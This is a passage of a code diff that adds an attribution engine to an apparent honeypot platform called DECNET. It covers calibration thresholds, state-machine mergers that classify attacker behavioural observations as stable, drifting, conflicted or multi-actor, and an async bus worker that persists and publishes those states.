    system-log = /var/log/decnet/decnet.system.log
@@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
        "master-host": "DECNET_SWARM_MASTER_HOST",
        "syslog-port": "DECNET_SWARM_SYSLOG_PORT",
        "swarmctl-port": "DECNET_SWARMCTL_PORT",
+        "swarmctl-host": "DECNET_SWARMCTL_HOST",
    },
    "logging": {
        "system-log": "DECNET_SYSTEM_LOGS",
--- a/decnet/correlation/attribution/__init__.py
+++ b/decnet/correlation/attribution/__init__.py
@@ -0,0 +1,21 @@
+"""DECNET attribution engine — v0 aggregation library.
+
+Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
+observations. No I/O, no bus, no DB. The bus subscriber and DB writes
+live in :mod:`decnet.correlation.attribution_worker` so this package
+stays trivially testable with synthetic observation lists.
+
+See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
+explicit bright line: this engine does NOT do persona classification
+(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
+named persons. It surfaces *behavioural coherence* and *behavioural
+drift*, and stops there.
+"""
+from __future__ import annotations
+
+from decnet.correlation.attribution.aggregate import (
+    AttributionState,
+    aggregate_observations,
+)
+
+__all__ = ["AttributionState", "aggregate_observations"]
--- a/decnet/correlation/attribution/_thresholds.py
+++ b/decnet/correlation/attribution/_thresholds.py
@@ -0,0 +1,62 @@
+"""Calibration thresholds for the attribution engine — every magic
+number lives here, named, with the calibration source cited.
+
+v0 values are heuristic. Real calibration ships when red-team
+exercises produce labelled trace data
+(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
+are the engine's only knobs; aggregate.py never embeds a literal.
+"""
+from __future__ import annotations
+
+# ── Categorical merger ────────────────────────────────────────────────
+# Last-N window size for the categorical state machine. 5 calibrates
+# against typical session counts (most attackers are observed < 10
+# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
+# 2"). Operators with long-running attackers will want a wider window
+# in v1.
+CATEGORICAL_WINDOW_N = 5
+
+# Minimum observations before the merger emits anything other than
+# ``unknown``. Below this floor the state machine has no signal.
+MIN_OBSERVATIONS_FOR_STATE = 3
+
+# Categorical merger is one-outlier-tolerant: in a window of N=5, the
+# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
+CATEGORICAL_MAJORITY_THRESHOLD = 4
+
+# ── Numeric merger ────────────────────────────────────────────────────
+# EWMA smoothing factor for numeric primitives. 0.3 weights recent
+# observations enough to surface drift quickly without flapping on
+# single outliers.
+NUMERIC_EWMA_ALPHA = 0.3
+
+# Coefficient-of-variation thresholds: dispersion / |mean|.
+NUMERIC_STABLE_DISPERSION_PCT = 0.20    # < 20% of mean → stable
+NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30     # mean moved > 30% → drifting
+NUMERIC_CONFLICT_DISPERSION_PCT = 1.0   # > 100% of mean → conflicted
+
+# ── Hash merger ───────────────────────────────────────────────────────
+# Rotations within HASH_DRIFT_WINDOW_SECS count toward state transitions.
+# 1..HASH_DRIFT_MAX → drifting; more → conflicted. The values mirror the
+# DEBT-032 fingerprint-rotation calibration — bumped by one because
+# the attribution engine takes one rotation as evidence-of-life, not
+# yet evidence-of-drift.
+HASH_DRIFT_MAX = 2
+HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60  # 24h
+
+# ── Multi-actor cap ───────────────────────────────────────────────────
+# multi_actor confidence is capped to keep the dashboard honest about
+# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
+# flapping primitives on flaky networks look like two operators.
+MULTI_ACTOR_MAX_CONFIDENCE = 0.6
+
+# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
+# Minimum number of primitives that must independently flag
+# ``multi_actor`` for the same identity before
+# ``attribution.profile.multi_actor_suspected`` fires.
+MULTI_ACTOR_MIN_PRIMITIVES = 2
+
+# Tick interval for the periodic walk in
+# :mod:`decnet.correlation.attribution_worker`. Configurable via env
+# var in v1; hardcoded in v0.
+MULTI_ACTOR_TICK_SECS = 60.0
--- a/decnet/correlation/attribution/aggregate.py
+++ b/decnet/correlation/attribution/aggregate.py
@@ -0,0 +1,418 @@
+"""Per-(identity, primitive) state-machine — the attribution engine's
+core merge logic.
+
+Pure: given a list of BEHAVE observations for one
+``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
+returns the derived state. No DB, no bus, no I/O. The worker
+(``decnet.correlation.attribution_worker``) is responsible for loading
+the observations and writing the state row.
+
+State vocabulary is frozen at five values (see
+``ATTRIBUTION-ENGINE.md``):
+
+* ``unknown``      — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
+* ``stable``       — recent N agree
+* ``drifting``     — recent N stable but disagree with older N
+* ``conflicted``   — recent N split
+* ``multi_actor``  — conflicted + cross-session alternation pattern
+
+Phase 2 ships :func:`aggregate_categorical` (the dominant ValueKind
+for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
+the ValueKind dispatcher in :func:`aggregate_observations`.
+"""
+from __future__ import annotations
+
+from collections import Counter
+from dataclasses import dataclass
+from typing import Any, Sequence
+
+from decnet.correlation.attribution import _thresholds as _T
+
+__all__ = [
+    "AttributionState",
+    "aggregate_observations",
+    "aggregate_categorical",
+    "aggregate_numeric",
+    "aggregate_hash",
+]
+
+
+@dataclass(frozen=True)
+class AttributionState:
+    """Output of the merger for one ``(identity, primitive)`` pair.
+
+    The fields map onto :class:`AttributionStateRow` columns; the
+    worker composes the final dict for ``upsert_attribution_state``
+    by adding ``identity_uuid`` + ``primitive`` (the merger does not
+    own the natural key) and a ``last_change_ts`` derived from the
+    prior row.
+    """
+
+    current_value: Any
+    state: str
+    confidence: float
+    observation_count: int
+    last_observation_ts: float
+
+
+def aggregate_observations(
+    observations: Sequence[dict[str, Any]],
+    *,
+    value_kind: str | None = None,
+) -> AttributionState:
+    """Run the merger over *observations* and return derived state.
+
+    *observations* is a list of dicts with at minimum ``value``,
+    ``ts``, ``confidence`` (matching
+    ``ObservationRow.observations_time_series`` output). Sessions
+    are derived from the ``ts`` axis — the merger does not need a
+    separate session id; cross-session alternation is detected by
+    the gap distribution. Sessions are NOT collapsed before the
+    merger; ``multi_actor`` reasons over the full per-observation
+    series.
+
+    *value_kind* is a hint from the BEHAVE primitive registry:
+    ``"categorical"`` (or ``None``, treated as categorical),
+    ``"numeric"`` and ``"hash"`` dispatch to the matching merger; any
+    other value raises :class:`ValueError`.
+    """
+    if not observations:
+        return _unknown(0.0, count=0)
+    if value_kind in (None, "categorical"):
+        return aggregate_categorical(observations)
+    if value_kind == "numeric":
+        return aggregate_numeric(observations)
+    if value_kind == "hash":
+        return aggregate_hash(observations)
+    raise ValueError(
+        f"aggregate_observations: unknown value_kind={value_kind!r}; "
+        "expected 'categorical' | 'numeric' | 'hash' | None",
+    )
+
+
+def aggregate_numeric(
+    observations: Sequence[dict[str, Any]],
+) -> AttributionState:
+    """Numeric merger — for primitives whose ``value`` is an int /
+    float (e.g. ``toolchain.c2.beacon_interval_ms``,
+    ``motor.paste_burst_rate``).
+
+    Compares the EWMA of the recent window against the EWMA of the
+    older window; reports dispersion as coefficient of variation.
+
+    * < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
+    * recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
+      (checked first, so it wins over a simultaneous mean shift)
+    * else, an older window exists and the mean shifted by
+      >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
+    * otherwise → ``stable`` (``NUMERIC_STABLE_DISPERSION_PCT`` is
+      not consulted by this function)
+
+    Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
+    tighter dispersion = higher confidence. Conflicted is ``0.5``
+    by convention; we cannot meaningfully claim certainty in a
+    statistic computed over a degenerate sample.
+
+    ``current_value`` is the recent EWMA, not the last raw
+    observation: numeric primitives are noisy by nature and
+    surfacing the smoothed estimate keeps the dashboard from
+    flapping on every tick. ``multi_actor`` is *not* a numeric state
+    in v0 — bimodal distributions belong to the categorical
+    detector once the primitive's value space is bucketed.
+    """
+    n = len(observations)
+    last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
+    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
+        return AttributionState(
+            current_value=_safe_float(observations[-1].get("value")) if n else None,
+            state="unknown",
+            confidence=0.0,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    window = _T.CATEGORICAL_WINDOW_N
+    recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
+    older_vals = [
+        _safe_float(o.get("value"))
+        for o in observations[-2 * window: -window]
+    ]
+    recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
+    recent_cv = _coef_of_variation(recent_vals, recent_mean)
+
+    if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
+        return AttributionState(
+            current_value=recent_mean,
+            state="conflicted",
+            confidence=0.5,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    if older_vals:
+        older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
+        denom = abs(older_mean) if older_mean != 0 else 1.0
+        mean_shift = abs(recent_mean - older_mean) / denom
+        if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
+            return AttributionState(
+                current_value=recent_mean,
+                state="drifting",
+                confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
+                observation_count=n,
+                last_observation_ts=last_ts,
+            )
+
+    return AttributionState(
+        current_value=recent_mean,
+        state="stable",
+        confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
+        observation_count=n,
+        last_observation_ts=last_ts,
+    )
+
+
+def aggregate_hash(
+    observations: Sequence[dict[str, Any]],
+) -> AttributionState:
+    """Hash merger — for rotation-resistant fingerprints
+    (``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
+
+    The merger does NOT recompute hashes; DEBT-032
+    (``decnet.correlation.fingerprint_rotation``) already produces
+    one observation per rotation event. The state machine counts
+    distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
+    most recent observation:
+
+    * 0 rotations (single hash, any count) → ``stable``
+    * 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
+    * > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
+
+    ``unknown`` fires only on empty input — a single hash with one
+    observation is enough signal to say "stable", because hashes
+    don't have a noisy baseline the way categorical/numeric
+    primitives do.
+
+    ``current_value`` is the most recent hash. Confidence is
+    ``1 / (1 + rotations_in_window)`` — one rotation halves
+    confidence, two rotations cut it to a third, etc.
+    """
+    n = len(observations)
+    if n == 0:
+        return _unknown(0.0, count=0)
+    last_ts = float(observations[-1].get("ts", 0.0))
+    last_value = observations[-1].get("value")
+
+    window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
+    in_window = [
+        o for o in observations
+        if float(o.get("ts", 0.0)) >= window_start
+    ]
+    distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
+    rotations = max(0, distinct - 1)
+    confidence = 1.0 / (1.0 + rotations)
+
+    if rotations == 0:
+        state = "stable"
+    elif rotations <= _T.HASH_DRIFT_MAX:
+        state = "drifting"
+    else:
+        state = "conflicted"
+
+    return AttributionState(
+        current_value=last_value,
+        state=state,
+        confidence=confidence,
+        observation_count=n,
+        last_observation_ts=last_ts,
+    )
+
+
+def _ewma(values: Sequence[float], alpha: float) -> float:
+    """Single-pass EWMA. Empty input is illegal; callers gate on
+    ``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
+    it = iter(values)
+    smoothed = next(it)
+    for v in it:
+        smoothed = alpha * v + (1.0 - alpha) * smoothed
+    return smoothed
+
+
+def _coef_of_variation(values: Sequence[float], mean: float) -> float:
+    """Population-style CV = stdev / |mean|. Returns 0 on a constant
+    signal; returns +inf-equivalent (1e9) when the mean is exactly
+    zero and the signal isn't constant — so the conflicted threshold
+    fires without us having to special-case it upstream."""
+    if not values:
+        return 0.0
+    diffs_sq = [(v - mean) ** 2 for v in values]
+    variance = sum(diffs_sq) / len(values)
+    stdev = variance ** 0.5
+    if mean == 0:
+        return 0.0 if stdev == 0 else 1e9
+    return stdev / abs(mean)
+
+
+def _safe_float(value: Any) -> float:
+    """Defensive coercion — observations may carry value=None on
+    unknown-emitter primitives. Treat None as 0.0; the dispersion
+    check will surface the resulting flat baseline as 'stable'
+    which is the honest answer for a single-observation primitive
+    that hasn't fired yet."""
+    if value is None:
+        return 0.0
+    if isinstance(value, bool):
+        return 1.0 if value else 0.0
+    return float(value)
+
+
+def aggregate_categorical(
+    observations: Sequence[dict[str, Any]],
+) -> AttributionState:
+    """Categorical merger — the dominant case for BEHAVE-SHELL.
+
+    Compares the recent N-window against the older N-window. With
+    ``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
+    = 4``:
+
+    * no observations at all → ``unknown`` (``current_value`` is ``None``)
+    * fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
+    * recent window has a clear majority + matches older window → ``stable``
+    * recent window has a clear majority + differs from older window → ``drifting``
+    * recent window has a clear majority + older window had none → ``drifting``
+    * recent window split + alternation pattern across observations → ``multi_actor``
+    * recent window split + no alternation → ``conflicted``
+
+    Confidence is the recent-window agreement ratio; ``multi_actor``
+    is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. ``current_value`` is
+    the most-recent observation's value for ``unknown``,
+    ``multi_actor`` and ``conflicted`` (the dashboard wants a value to
+    render even on ``conflicted`` rows) and the recent-window majority
+    value for ``stable`` and ``drifting``.
+
+    Args:
+        observations: observation dicts, oldest first; each is read
+            via ``.get("value")`` and the last one via ``.get("ts")``.
+
+    Returns:
+        The merged :class:`AttributionState`.
+    """
+    n = len(observations)
+    if n == 0:
+        # Nothing to index into: report "unknown" instead of raising
+        # IndexError on observations[-1].
+        return _unknown(0.0, count=0)
+
+    last_ts = float(observations[-1].get("ts", 0.0))
+    last_value = observations[-1].get("value")
+
+    def _state(state: str, value: Any, confidence: float) -> AttributionState:
+        # Every outcome shares the observation count and last timestamp.
+        return AttributionState(
+            current_value=value,
+            state=state,
+            confidence=confidence,
+            observation_count=n,
+            last_observation_ts=last_ts,
+        )
+
+    if n < _T.MIN_OBSERVATIONS_FOR_STATE:
+        return _state("unknown", last_value, 0.0)
+
+    window = _T.CATEGORICAL_WINDOW_N
+    recent_values = [o.get("value") for o in observations[-window:]]
+    top_value, top_count = Counter(recent_values).most_common(1)[0]
+    recent_size = len(recent_values)
+    confidence = top_count / recent_size
+
+    # The threshold is clamped to the window size so a short window
+    # can still be "clear" when it is unanimous.
+    is_recent_clear = top_count >= min(
+        _T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
+    )
+
+    if not is_recent_clear:
+        # Split recent window. Distinguish multi_actor (alternation)
+        # from random conflict.
+        if _is_alternation(observations):
+            return _state(
+                "multi_actor",
+                last_value,
+                min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
+            )
+        return _state("conflicted", last_value, confidence)
+
+    # Recent window has a clear majority. Compare to the prior
+    # window to decide stable vs drifting.
+    older = observations[-2 * window: -window]
+    if not older:
+        # Only one window's worth of data — call it stable.
+        return _state("stable", top_value, confidence)
+
+    older_values = [o.get("value") for o in older]
+    older_top_value, older_top_count = Counter(older_values).most_common(1)[0]
+    older_clear = older_top_count >= min(
+        _T.CATEGORICAL_MAJORITY_THRESHOLD, len(older_values),
+    )
+
+    # Drift covers two cases: the older window was itself conflicted
+    # and the series has just converged, or both windows are clear but
+    # disagree on the majority value.
+    if not older_clear or older_top_value != top_value:
+        return _state("drifting", top_value, confidence)
+    return _state("stable", top_value, confidence)
+
+
+def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
+    """Heuristic: does the recent window ping-pong between two values
+    (operator A → B → A → B) rather than thrash at random?
+
+    Deliberately conservative. The last ``CATEGORICAL_WINDOW_N``
+    observations must number at least 4, contain exactly 2 distinct
+    values, and show at least twice as many flips (adjacent values
+    differ) as repeats, with the repeat count floored at 1.
+    ATTRIBUTION-ENGINE.md §"Open question 1" warns that flapping
+    primitives on flaky networks look like two operators; this guard
+    is what keeps the false-positive rate down.
+    """
+    tail = observations[-_T.CATEGORICAL_WINDOW_N:]
+    if len(tail) < 4:
+        return False
+    seq = [item.get("value") for item in tail]
+    if len(set(seq)) != 2:
+        return False
+    # Count adjacent pairs whose values differ.
+    flips = sum(cur != prev for prev, cur in zip(seq, seq[1:]))
+    repeats = len(seq) - 1 - flips
+    return flips >= 2 * max(repeats, 1)
+
+
+def _unknown(last_ts: float, *, count: int) -> AttributionState:
+    """Build the placeholder ``unknown`` state: no current value and
+    zero confidence, carrying only the observation *count* and the
+    timestamp of the last observation."""
+    return AttributionState(
+        state="unknown",
+        current_value=None,
+        confidence=0.0,
+        last_observation_ts=last_ts,
+        observation_count=count,
+    )
--- a/decnet/correlation/attribution_worker.py
+++ b/decnet/correlation/attribution_worker.py
@@ -0,0 +1,394 @@
+"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
+
+Subscribes to ``attacker.observation.>`` and, for each event, ensures
+the source attacker has a stub identity in ``attacker_identities``,
+re-runs the merger over that identity's observation series for the
+primitive, upserts the resulting ``attribution_state`` row, and
+publishes ``attribution.profile.state_changed`` when the state
+transitions. A periodic tick additionally emits
+``attribution.profile.multi_actor_suspected``.
+
+Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe,
+publish derived events with :func:`publish_safely`, log per-handler
+exceptions and continue. Unlike the reuse worker there is no
+poll-only fallback here: if the bus is unavailable at startup the
+worker starts no tasks and idles until it is shut down.
+
+Trigger isolation: the per-event handler is wrapped in a single
+try/except. Any exception is logged and the loop continues with the
+next event. This is the same posture BEHAVE-SHELL's
+``_handler.handle_session_ended`` adopts.
+"""
+from __future__ import annotations
+
+import asyncio
+import contextlib
+from typing import Any
+
+from decnet.bus import topics as _topics
+from decnet.bus.base import BaseBus
+from decnet.bus.factory import get_bus
+from decnet.bus.publish import (
+    publish_safely,
+    run_control_listener_signal as _run_control_listener_signal,
+    run_health_heartbeat as _run_health_heartbeat,
+)
+from decnet.correlation.attribution import _thresholds as _T
+from decnet.correlation.attribution.aggregate import aggregate_observations
+from decnet.logging import get_logger
+from decnet.web.db.repository import BaseRepository
+
+try:
+    from behave_shell.spec import (
+        PRIMITIVE_REGISTRY,
+        ValueKind,
+    )
+    _BEHAVE_REGISTRY_AVAILABLE = True
+except ImportError:  # pragma: no cover
+    PRIMITIVE_REGISTRY = {}
+    ValueKind = None
+    _BEHAVE_REGISTRY_AVAILABLE = False
+
+log = get_logger("correlation.attribution_worker")
+
+_WORKER_NAME = "attribution"
+_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
+
+
+async def run_attribution_loop(
+    repo: BaseRepository,
+    *,
+    shutdown: asyncio.Event | None = None,
+    multi_actor_tick_secs: float | None = None,
+) -> None:
+    """Run the attribution worker until cancelled.
+
+    Background tasks started once the bus connects:
+
+    1. ``_consume_observations`` — bus subscription on
+       ``attacker.observation.>``; per-event handler upserts state.
+    2. ``_multi_actor_tick_loop`` — periodic walk of ``attribution_state``
+       firing ``attribution.profile.multi_actor_suspected`` when an
+       identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
+       ``multi_actor`` state. Phase 5.
+    3. Health + control standard channels (one task each).
+
+    If obtaining or connecting the bus raises, a warning is logged,
+    no task is started, and the function simply waits for shutdown —
+    nothing in this function retries the connection.
+
+    *shutdown* is an optional external stop signal. When omitted a
+    private event is created that nothing here ever sets, so the
+    function then ends only through cancellation.
+    *multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
+    (tests use this to drive the correlator without sleeping for a
+    minute).
+
+    ``asyncio.CancelledError`` / ``KeyboardInterrupt`` raised while
+    waiting are caught and logged, not re-raised. On every exit path
+    the started tasks are cancelled and awaited, then the bus is
+    closed; errors during that cleanup are suppressed.
+    """
+    log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
+
+    bus: BaseBus | None = None
+    sub_task: asyncio.Task | None = None
+    tick_task: asyncio.Task | None = None
+    heartbeat_task: asyncio.Task | None = None
+    control_task: asyncio.Task | None = None
+    # Explicit ``is not None`` so a caller-supplied 0 is honoured.
+    tick_secs = (
+        multi_actor_tick_secs
+        if multi_actor_tick_secs is not None
+        else _T.MULTI_ACTOR_TICK_SECS
+    )
+    try:
+        candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
+        await candidate.connect()
+        # Only publish the bus to the cleanup path once connect succeeded.
+        bus = candidate
+        sub_task = asyncio.create_task(
+            _consume_observations(bus, repo),
+        )
+        tick_task = asyncio.create_task(
+            _multi_actor_tick_loop(bus, repo, tick_secs),
+        )
+        heartbeat_task = asyncio.create_task(
+            _run_health_heartbeat(bus, _WORKER_NAME),
+        )
+        control_task = asyncio.create_task(
+            _run_control_listener_signal(bus, _WORKER_NAME),
+        )
+    except Exception as exc:  # noqa: BLE001
+        # Best-effort startup: fall through with no tasks running.
+        log.warning(
+            "attribution worker: bus unavailable, idle until bus returns: %s",
+            exc,
+        )
+
+    if shutdown is None:
+        shutdown = asyncio.Event()
+
+    try:
+        await shutdown.wait()
+    except (asyncio.CancelledError, KeyboardInterrupt):
+        # Swallowed on purpose here; the finally block still runs cleanup.
+        log.info("attribution worker stopped")
+    finally:
+        for task in (sub_task, tick_task, heartbeat_task, control_task):
+            if task is None:
+                continue
+            task.cancel()
+            # Await so the task finishes unwinding before the bus closes.
+            with contextlib.suppress(asyncio.CancelledError, Exception):
+                await task
+        if bus is not None:
+            with contextlib.suppress(Exception):
+                await bus.close()
+
+
+async def _consume_observations(
+    bus: BaseBus, repo: BaseRepository,
+) -> None:
+    """Drain ``attacker.observation.>`` and hand every event to
+    :func:`handle_observation_event`.
+
+    A failure inside the handler is logged with its traceback and the
+    loop moves on to the next event, so one bad payload cannot kill
+    the subscription. Cancellation propagates to the caller. Any other
+    error raised by the subscription itself is logged as a warning and
+    ends this coroutine; nothing here re-subscribes.
+    """
+    try:
+        subscription = bus.subscribe(_OBSERVATION_PATTERN)
+        async with subscription:
+            async for incoming in subscription:
+                try:
+                    await handle_observation_event(bus, repo, incoming)
+                except Exception:  # noqa: BLE001
+                    log.exception("attribution worker: handler failed")
+    except asyncio.CancelledError:
+        raise
+    except Exception as err:  # noqa: BLE001
+        log.warning(
+            "attribution worker: subscriber for %s died (%s)",
+            _OBSERVATION_PATTERN, err,
+        )
+
+
+async def handle_observation_event(
+    bus: BaseBus | None,
+    repo: BaseRepository,
+    event: Any,
+) -> None:
+    """Handle one ``attacker.observation.<primitive>`` event.
+
+    Steps, in order:
+
+    1. Extract ``attacker_uuid`` and ``primitive`` from the payload;
+       events missing either are skipped with a debug log.
+    2. Ensure the source attacker has a stub identity. When the repo
+       returns ``None`` (no Attacker row yet) the event is deferred
+       with an info log.
+    3. Load the full observation series for (identity, primitive) and
+       run the merger selected by :func:`_value_kind_for`.
+    4. Upsert the resulting ``attribution_state`` row.
+       ``last_change_ts`` is carried over from the prior row when the
+       state did not change.
+    5. Publish ``attribution.profile.state_changed`` only when the
+       state differs from the prior row (or there was no prior row)
+       and *bus* is not ``None``.
+
+    *event* is whatever shape :class:`BaseBus`'s subscription yields —
+    a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
+    fields — or a plain dict (see :func:`_payload_of`). The payload
+    carries the BEHAVE envelope plus DECNET-side ``attacker_uuid``
+    denorm (see
+    ``decnet.profiler.behave_shell._handler._publish_observation``).
+
+    Exceptions from the repository or the merger propagate to the
+    caller.
+    """
+    payload = _payload_of(event)
+    attacker_uuid = payload.get("attacker_uuid")
+    primitive = payload.get("primitive")
+    if not attacker_uuid or not primitive:
+        log.debug(
+            "attribution worker: skipping malformed event (uuid=%r primitive=%r)",
+            attacker_uuid, primitive,
+        )
+        return
+    identity_uuid = await repo.ensure_stub_identity_for_attacker(
+        str(attacker_uuid),
+    )
+    if identity_uuid is None:
+        log.info(
+            "attribution worker: no Attacker row for uuid=%s yet; deferring",
+            attacker_uuid,
+        )
+        return
+    primitive_str = str(primitive)
+
+    # Load the full per-(identity, primitive) observation series.
+    # v0 with 1:1 stub identities, this is the single attacker's
+    # series; v1's clusterer makes it a cross-attacker union.
+    observations = await repo.observations_for_identity_primitive(
+        identity_uuid, primitive_str,
+    )
+    if not observations:
+        log.debug(
+            "attribution worker: no observations yet for identity=%s "
+            "primitive=%s (race with upsert)",
+            identity_uuid, primitive_str,
+        )
+        return
+
+    # Run merger.
+    value_kind = _value_kind_for(primitive_str)
+    new_state = aggregate_observations(observations, value_kind=value_kind)
+
+    # Load prior state to detect transitions.
+    prior = await repo.get_attribution_state(identity_uuid, primitive_str)
+    state_changed = prior is None or prior.get("state") != new_state.state
+
+    # Persist. last_change_ts is locked to the prior row when state is
+    # unchanged so the dashboard's "stable since" timestamp doesn't
+    # reset on every observation.
+    last_change_ts = new_state.last_observation_ts
+    if prior is not None and not state_changed:
+        prior_change_ts = prior.get("last_change_ts")
+        # A prior row may carry the key with a None value; float(None)
+        # would raise, so fall back to the new observation timestamp.
+        if prior_change_ts is not None:
+            last_change_ts = float(prior_change_ts)
+    await repo.upsert_attribution_state({
+        "identity_uuid": identity_uuid,
+        "primitive": primitive_str,
+        "current_value": new_state.current_value,
+        "state": new_state.state,
+        "confidence": new_state.confidence,
+        "observation_count": new_state.observation_count,
+        "last_change_ts": last_change_ts,
+        "last_observation_ts": new_state.last_observation_ts,
+    })
+
+    # Emit state_changed only on transition. Idempotent re-runs (same
+    # observations, same merger output) produce no event — matches
+    # the loop-prevention invariant that ttp.tagged uses.
+    if state_changed and bus is not None:
+        await publish_safely(
+            bus,
+            _topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
+            {
+                "identity_uuid": identity_uuid,
+                "primitive": primitive_str,
+                "old_state": prior.get("state") if prior else None,
+                "new_state": new_state.state,
+                "current_value": new_state.current_value,
+                "confidence": new_state.confidence,
+                "observation_count": new_state.observation_count,
+                "ts": new_state.last_observation_ts,
+            },
+            event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
+        )
+        log.info(
+            "attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
+            identity_uuid, primitive_str,
+            (prior or {}).get("state") or "<new>", new_state.state,
+            new_state.confidence,
+        )
+
+
+def _value_kind_for(primitive: str) -> str:
+    """Pick the merger tag for a BEHAVE primitive name.
+
+    The BEHAVE registry's ``ValueKind`` enum collapses onto the three
+    mergers the engine ships:
+
+    * ``NUMERIC`` → ``"numeric"``
+    * ``HASH``    → ``"hash"``
+    * everything else (``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` /
+      ``ARRAY``) → ``"categorical"`` — BOOL is a 2-cardinality
+      categorical; FREE_STRING and ARRAY are treated as opaque tokens
+      until a v1 specialised merger lands
+
+    ``"categorical"`` is also the answer when the registry could not
+    be imported or does not know the primitive — the safest fallback
+    because the categorical merger is one-outlier-tolerant and won't
+    lie about confidence on noisy categorical data the way a numeric
+    merger would on non-numeric values.
+    """
+    fallback = "categorical"
+    if not _BEHAVE_REGISTRY_AVAILABLE:
+        return fallback
+    entry = PRIMITIVE_REGISTRY.get(primitive)
+    if entry is None or ValueKind is None:
+        return fallback
+    kind = entry.kind
+    if kind is ValueKind.NUMERIC:
+        return "numeric"
+    return "hash" if kind is ValueKind.HASH else fallback
+
+
+def _payload_of(event: Any) -> dict[str, Any]:
+    """Return the dict payload carried by *event*.
+
+    Accepts either an object exposing a ``payload`` attribute or a
+    bare dict (test fixtures may pass either). Anything that does not
+    resolve to a dict yields an empty dict.
+    """
+    try:
+        candidate = event.payload
+    except AttributeError:
+        # No ``payload`` attribute: treat the event itself as the payload.
+        candidate = event
+    if isinstance(candidate, dict):
+        return candidate
+    return {}
+
+
+async def _multi_actor_tick_loop(
+    bus: BaseBus, repo: BaseRepository, interval_secs: float,
+) -> None:
+    """Run :func:`tick_multi_actor` forever, sleeping *interval_secs*
+    after each pass, so that
+    ``attribution.profile.multi_actor_suspected`` is emitted for any
+    identity whose multi_actor primitives changed since the last tick.
+
+    Dedupe state is a single in-memory map (identity_uuid →
+    frozenset(primitives)) created here and handed to every tick.
+    Same primitive set as last fire → no re-emit. New primitive
+    joining the set → re-emit. Set shrinks below
+    ``MULTI_ACTOR_MIN_PRIMITIVES`` → the entry is dropped so it
+    re-arms.
+
+    Because the map lives only in this coroutine, a restart forgets
+    it and the first tick afterwards re-emits the current set. That
+    is acceptable for v0 since the underlying ``attribution_state``
+    rows persist; v1 may persist a ``multi_actor_suspect_log`` table.
+
+    A failing tick is logged and the loop carries on; the loop ends
+    only when the task is cancelled.
+    """
+    fired_signatures: dict[str, frozenset[str]] = {}
+    while True:
+        try:
+            await tick_multi_actor(bus, repo, fired_signatures)
+        except Exception:  # noqa: BLE001
+            log.exception("attribution worker: multi_actor tick failed")
+        await asyncio.sleep(interval_secs)
+
+
+async def tick_multi_actor(
+    bus: BaseBus | None,
+    repo: BaseRepository,
+    last_fired: dict[str, frozenset[str]],
+) -> int:
+    """One pass of the cross-primitive correlator. Public for tests.
+
+    Args:
+        bus: bus to publish on; ``None`` skips publishing (dedupe
+            state is still updated).
+        repo: repository providing ``list_multi_actor_identities()``;
+            each entry is read for ``identity_uuid`` and ``primitives``.
+        last_fired: dedupe map identity_uuid → frozenset(primitives),
+            mutated in place. Identities that no longer qualify are
+            removed so a later qualifying set fires again.
+
+    Returns:
+        The number of ``multi_actor_suspected`` events emitted.
+    """
+    candidates = await repo.list_multi_actor_identities()
+    fired = 0
+    seen_now: set[str] = set()
+    for entry in candidates:
